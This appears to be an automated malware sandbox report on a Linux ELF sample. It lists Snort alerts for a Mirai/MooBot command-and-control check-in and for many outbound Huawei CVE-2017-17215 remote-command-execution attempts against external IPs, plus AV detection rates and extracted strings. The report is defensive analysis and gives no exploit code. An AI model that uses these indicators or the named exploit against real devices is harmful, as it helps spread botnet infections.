                      Timestamp:2024-07-20T23:05:38.781505+0200
                      SID:2027339
                      Source Port:49192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.611583+0200
                      SID:2027339
                      Source Port:43606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.661091+0200
                      SID:2027339
                      Source Port:58938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.632661+0200
                      SID:2027339
                      Source Port:51304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871918+0200
                      SID:2835222
                      Source Port:39396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.676834+0200
                      SID:2835222
                      Source Port:55138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695781+0200
                      SID:2027339
                      Source Port:47314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.676145+0200
                      SID:2835222
                      Source Port:41262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.674515+0200
                      SID:2835222
                      Source Port:34146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.363294+0200
                      SID:2835222
                      Source Port:54656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.632661+0200
                      SID:2027339
                      Source Port:41710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.868951+0200
                      SID:2835222
                      Source Port:39550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.970943+0200
                      SID:2835222
                      Source Port:40848
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.870658+0200
                      SID:2835222
                      Source Port:56990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872953+0200
                      SID:2835222
                      Source Port:49320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695781+0200
                      SID:2027339
                      Source Port:35954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.673459+0200
                      SID:2835222
                      Source Port:48094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.862080+0200
                      SID:2835222
                      Source Port:42306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354743+0200
                      SID:2835222
                      Source Port:55230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.606405+0200
                      SID:2027339
                      Source Port:53836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354140+0200
                      SID:2835222
                      Source Port:48312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.613649+0200
                      SID:2027339
                      Source Port:37412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:45.492662+0200
                      SID:2835222
                      Source Port:40526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.664967+0200
                      SID:2027339
                      Source Port:39124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.474238+0200
                      SID:2027339
                      Source Port:39334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.868951+0200
                      SID:2835222
                      Source Port:59492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354373+0200
                      SID:2835222
                      Source Port:58684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.534770+0200
                      SID:2027339
                      Source Port:53750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.866516+0200
                      SID:2835222
                      Source Port:53906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.676834+0200
                      SID:2835222
                      Source Port:35550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359675+0200
                      SID:2835222
                      Source Port:39250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.427267+0200
                      SID:2027339
                      Source Port:47506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.678246+0200
                      SID:2835222
                      Source Port:52518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.346416+0200
                      SID:2835222
                      Source Port:41594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.342361+0200
                      SID:2835222
                      Source Port:46180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:39.158428+0200
                      SID:2030490
                      Source Port:43130
                      Destination Port:2466
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-20T23:05:37.675714+0200
                      SID:2027339
                      Source Port:55466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.863434+0200
                      SID:2835222
                      Source Port:60218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:35.950141+0200
                      SID:2027339
                      Source Port:50242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.673041+0200
                      SID:2835222
                      Source Port:43332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354140+0200
                      SID:2835222
                      Source Port:59422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.340522+0200
                      SID:2835222
                      Source Port:35312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.868951+0200
                      SID:2835222
                      Source Port:46300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.613649+0200
                      SID:2027339
                      Source Port:41440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.673041+0200
                      SID:2835222
                      Source Port:59524
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.673041+0200
                      SID:2835222
                      Source Port:56444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359675+0200
                      SID:2835222
                      Source Port:60832
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.346416+0200
                      SID:2835222
                      Source Port:40838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.485425+0200
                      SID:2027339
                      Source Port:58408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.352367+0200
                      SID:2835222
                      Source Port:40212
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871918+0200
                      SID:2835222
                      Source Port:57522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.675714+0200
                      SID:2027339
                      Source Port:47036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.803904+0200
                      SID:2027339
                      Source Port:38338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354140+0200
                      SID:2835222
                      Source Port:40292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.550808+0200
                      SID:2835222
                      Source Port:56722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:46.358513+0200
                      SID:2027339
                      Source Port:57194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.606405+0200
                      SID:2027339
                      Source Port:46508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.363294+0200
                      SID:2835222
                      Source Port:54982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.619355+0200
                      SID:2835222
                      Source Port:53346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.670904+0200
                      SID:2835222
                      Source Port:49980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.332387+0200
                      SID:2835222
                      Source Port:50998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359675+0200
                      SID:2835222
                      Source Port:59144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.352367+0200
                      SID:2835222
                      Source Port:48014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.674515+0200
                      SID:2835222
                      Source Port:48960
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.346416+0200
                      SID:2835222
                      Source Port:57526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.685966+0200
                      SID:2027339
                      Source Port:57516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695781+0200
                      SID:2027339
                      Source Port:59062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.682964+0200
                      SID:2835222
                      Source Port:52708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354743+0200
                      SID:2835222
                      Source Port:53580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.363294+0200
                      SID:2835222
                      Source Port:53020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359785+0200
                      SID:2835222
                      Source Port:42890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.338393+0200
                      SID:2835222
                      Source Port:55582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.343632+0200
                      SID:2835222
                      Source Port:59354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.485425+0200
                      SID:2027339
                      Source Port:35732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.475273+0200
                      SID:2027339
                      Source Port:37440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.356816+0200
                      SID:2835222
                      Source Port:33080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.632661+0200
                      SID:2027339
                      Source Port:60306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.678246+0200
                      SID:2835222
                      Source Port:46100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.676145+0200
                      SID:2835222
                      Source Port:58484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.680576+0200
                      SID:2835222
                      Source Port:53120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.656252+0200
                      SID:2027339
                      Source Port:48380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872982+0200
                      SID:2835222
                      Source Port:34586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.338393+0200
                      SID:2835222
                      Source Port:38846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354743+0200
                      SID:2835222
                      Source Port:48098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.591367+0200
                      SID:2027339
                      Source Port:37940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.645873+0200
                      SID:2027339
                      Source Port:41514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.493410+0200
                      SID:2027339
                      Source Port:34304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.676145+0200
                      SID:2835222
                      Source Port:51844
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.338393+0200
                      SID:2835222
                      Source Port:42990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.332244+0200
                      SID:2835222
                      Source Port:39332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.865440+0200
                      SID:2835222
                      Source Port:34140
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.674515+0200
                      SID:2835222
                      Source Port:44754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354743+0200
                      SID:2835222
                      Source Port:47084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.870658+0200
                      SID:2835222
                      Source Port:43574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.663519+0200
                      SID:2835222
                      Source Port:44460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 1gx339YsKN.elfAvira: detected
                      Source: 1gx339YsKN.elfReversingLabs: Detection: 57%
                      Source: 1gx339YsKN.elfVirustotal: Detection: 56%Perma Link
                      Source: 1gx339YsKN.elfJoe Sandbox ML: detected
                      Source: 1gx339YsKN.elfString: Content-Length: abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinenetstatwgetcurl/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3f

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:37550 -> 15.235.203.214:2466
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42340 -> 197.112.26.200:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42340 -> 197.112.26.200:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48590 -> 157.183.110.42:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48590 -> 157.183.110.42:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43638 -> 197.164.78.122:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43638 -> 197.164.78.122:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55366 -> 31.226.75.152:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55366 -> 31.226.75.152:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47294 -> 186.23.77.122:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47294 -> 186.23.77.122:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45738 -> 197.48.133.159:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45738 -> 197.48.133.159:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57716 -> 197.164.23.3:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57716 -> 197.164.23.3:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37594 -> 197.209.199.16:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37594 -> 197.209.199.16:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45392 -> 157.233.53.190:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45392 -> 157.233.53.190:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54612 -> 197.152.207.21:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54612 -> 197.152.207.21:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47806 -> 157.183.5.146:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47806 -> 157.183.5.146:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:32804 -> 94.44.111.34:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:32804 -> 94.44.111.34:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49252 -> 157.148.29.80:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49252 -> 157.148.29.80:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51272 -> 157.194.67.142:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51272 -> 157.194.67.142:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42050 -> 157.62.62.113:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42050 -> 157.62.62.113:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36214 -> 197.40.168.196:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36214 -> 197.40.168.196:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35948 -> 157.153.42.4:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35948 -> 157.153.42.4:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50092 -> 157.244.153.74:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50092 -> 157.244.153.74:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49870 -> 181.89.181.103:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49870 -> 181.89.181.103:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40008 -> 133.28.220.100:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40008 -> 133.28.220.100:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44230 -> 157.18.39.4:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44230 -> 157.18.39.4:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44722 -> 157.96.246.174:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44722 -> 157.96.246.174:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40202 -> 157.157.49.65:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40202 -> 157.157.49.65:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50094 -> 157.104.80.16:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50094 -> 157.104.80.16:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46850 -> 157.22.107.208:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46850 -> 157.22.107.208:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56116 -> 157.184.79.183:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56116 -> 157.184.79.183:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56092 -> 41.248.234.133:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56092 -> 41.248.234.133:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43494 -> 41.146.165.184:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43494 -> 41.146.165.184:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50926 -> 18.5.132.170:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50926 -> 18.5.132.170:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52176 -> 198.80.229.185:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52176 -> 198.80.229.185:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59386 -> 157.32.82.175:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59386 -> 157.32.82.175:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47186 -> 157.145.195.153:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47186 -> 157.145.195.153:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42092 -> 41.209.69.235:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42092 -> 41.209.69.235:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36520 -> 197.157.247.234:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36520 -> 197.157.247.234:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49388 -> 157.196.44.133:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49388 -> 157.196.44.133:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53444 -> 131.78.104.9:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53444 -> 131.78.104.9:37215
